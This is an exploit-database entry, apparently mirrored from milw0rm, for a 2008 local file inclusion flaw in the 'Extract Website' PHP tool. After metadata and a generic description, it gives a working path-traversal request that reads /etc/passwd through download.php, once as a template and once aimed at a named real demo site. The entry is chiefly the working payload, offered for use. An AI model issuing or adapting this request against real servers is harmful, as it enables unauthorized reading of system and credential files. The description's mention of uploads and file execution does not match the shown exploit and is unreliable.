Extract Website (download.php filename) Local File Include

vendor:

Extract Website

by:

Cold z3ro

7.5

CVSS

HIGH

Local File Include

CWE

Product Name: Extract Website

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Extract Website (download.php filename) Local File Include

This exploit allows an attacker to include a file on the server through the web application. The vulnerability is present when a web application allows the user to submit input into files or upload files to the server. The malicious user can then insert a file path that will allow the execution of a file on the web server. This can lead to the disclosure of sensitive information, manipulation of data, or even server compromise.

Mitigation:

Input validation should be used to prevent the inclusion of files from outside the intended directory.

Source

Exploit-DB raw data:

Extract Website (download.php filename) Local File Include

# author : Cold z3ro, http://www.hackteach.org/
# script : http://secure.emetrix.com/order/product.asp?PID=74332316
# demo   : http://www.rightscripts.com/extractwebsite/
# about  : This tool help you extract web data include URL links,
       domain names, contact emails, keywords, meta tags, page titles
       or text from other website.
       You can extract these data from a list of website links or from simple text.


# Exploit

[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd



# Example

[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd


==================================
Greetz : www.hackteach.org members , AnGeL25dZ

# milw0rm.com [2008-12-19]